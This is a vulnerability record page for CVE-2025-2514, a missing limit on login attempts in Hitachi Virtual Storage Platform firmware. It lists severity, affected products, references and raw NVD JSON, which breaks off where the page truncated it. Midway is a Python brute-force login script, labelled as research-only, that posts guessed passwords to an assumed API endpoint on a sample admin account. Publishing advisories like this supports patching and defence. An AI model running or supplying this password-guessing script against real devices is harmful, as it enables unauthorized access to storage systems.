CVE-2025-2514

Description

Improper restriction of excessive authentication attempts vulnerability in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28. This issue affects Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28 : before DKCMAIN Ver 88-08-16-xx/00, GUM Ver. 88-08-20/00, before DKCMAIN Ver 93-07-26-xx/00, GUM Ver. 93-07-26/00, before DKCMAIN Ver A3-04-02-xx/00, EMS Ver. A3-04-02/00, before DKCMAIN Ver A3-03-41-xx/00, EMS Ver. A3-03-41/00, before DKCMAIN Ver A3-03-03-xx/00, EMS Ver. A3-03-02/00.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hitachi:virtual_storage_one_block:23:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hitachi:virtual_storage_one_block:24:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hitachi:virtual_storage_one_block:26:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:hitachi:virtual_storage_one_block:28:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:hitachi:vsp_g130_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:hitachi:vsp_g130:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:hitachi:vsp_g150_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:hitachi:vsp_g150:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:hitachi:vsp_g350_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:hitachi:vsp_g350:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:hitachi:vsp_g370_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:hitachi:vsp_g370:-:*:*:*:*:*:*:* - NOT VULNERABLE

Hitachi Virtual Storage Platform G系列 before DKCMAIN Ver 88-08-16-xx/00

Hitachi Virtual Storage Platform G系列 before DKCMAIN Ver 93-07-26-xx/00

Hitachi Virtual Storage Platform E系列 before DKCMAIN Ver A3-04-02-xx/00

Hitachi Virtual Storage Platform E系列 before DKCMAIN Ver A3-03-41-xx/00

Hitachi Virtual Storage Platform One Block before DKCMAIN Ver A3-03-03-xx/00

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Disclaimer: This code is for educational purposes and security testing only.
# Do not use against systems without permission.

def brute_force_login(target_ip, username, password_list):
    """
    Simulates a brute force attack against a vulnerable login endpoint.
    Demonstrates the lack of rate limiting in CVE-2025-2514.
    """
    # Example endpoint, actual endpoint may vary based on product configuration
    target_url = f"https://{target_ip}/api/v1/login"
    
    headers = {
        "User-Agent": "CVE-2025-2514-Scanner",
        "Content-Type": "application/json"
    }

    print(f"[*] Starting brute force attempt on {target_url} for user: {username}")

    for password in password_list:
        payload = {
            "user": username,
            "pass": password
        }

        try:
            # In a real scenario, verify=False might be needed for self-signed certs
            response = requests.post(target_url, json=payload, headers=headers, timeout=5)
            
            # Check for successful login indicators (e.g., HTTP 200, specific token in response)
            if response.status_code == 200 and "token" in response.text:
                print(f"[+] SUCCESS: Valid password found -> {password}")
                return password
            else:
                print(f"[-] Failed: {password}")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")
            break

    print("[*] Attack completed.")
    return None

# Example usage
if __name__ == "__main__":
    target = "192.168.1.100"
    user = "admin"
    passwords = ["admin", "password", "123456", "Hitachi@2024"]
    brute_force_login(target, user, passwords)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-2514
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-2514
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-2514/
[4] VulDB https://vuldb.com/cve/CVE-2025-2514
[5] https://www.hitachi.com/products/it/storage-solutions/sec_info/2026/2026_306.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-2514", "sourceIdentifier": "[email protected]", "published": "2026-05-07T09:16:26.183", "lastModified": "2026-05-13T19:14:56.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper restriction of excessive authentication attempts vulnerability in Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28.\n\nThis issue affects Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H, Hitachi Virtual Storage Platform One Block 23, One Block 24, One Block 26, One Block 28 : before DKCMAIN Ver 88-08-16-xx/00, GUM Ver. 88-08-20/00, before DKCMAIN Ver 93-07-26-xx/00, GUM Ver. 93-07-26/00, before DKCMAIN Ver A3-04-02-xx/00, EMS Ver. A3-04-02/00, before DKCMAIN Ver A3-03-41-xx/00, EMS Ver. A3-03-41/00, before DKCMAIN Ver A3-03-03-xx/00, EMS Ver. A3-03-02/00."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:virtual_storage_one_block:23:*:*:*:*:*:*:*", "matchCriteriaId": "46788D83-153E-42CF-ACA5-09506AA45D54"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:virtual_storage_one_block:24:*:*:*:*:*:*:*", "matchCriteriaId": "EC7E00FD-2148-457B-B91A-FDB575DF8DF7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:virtual_storage_one_block:26:*:*:*:*:*:*:*", "matchCriteriaId": "04B799D3-FCF2-4832-8E5D-65D5BE53F47D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hitachi:virtual_storage_one_block:28:*:*:*:*:*:*:*", "matchCriteriaId": "CC55432F-8451-4859-A01A-946C26A793C6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g130_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F5B2BAC8-57F6-46ED-94DA-8736AD883AA0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g130:-:*:*:*:*:*:*:*", "matchCriteriaId": "13116ECB-AFB9-4B48-B17E-188D6DA59E9F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g150_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1885D369-A410-4713-8C6C-995983A41BFD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g150:-:*:*:*:*:*:*:*", "matchCriteriaId": "77D64FA2-123C-4FBB-B75A-34A927386B37"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g350_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A731027-8E2B-40BA-B9C4-4947C142E21E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g350:-:*:*:*:*:*:*:*", "matchCriteriaId": "E10C0C39-452D-4B45-BA08-AFA8A3C4865E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g370_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "11C63C8F-CD8D-4160-A235-956E555BF76A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g370:-:*:*:*:*:*:*:*", "matchCriteriaId": "9365C651-1AFD-421A-94A4-F2E5C9E4CBE8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g700_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "088FA23C-DA5D-4D18-B2B6-C08A69EBF5D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g700:-:*:*:*:*:*:*:*", "matchCriteriaId": "928EC0AA-5867-4645-BEFC-CC6EC1BE5DEF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hitachi:vsp_g900_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "50875AE9-8891-4663-BB57-9AF24CB886D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hitachi:vsp_g900:-:*:*:*:*:*:*:*", "matchCriteriaId": "2D ... (truncated)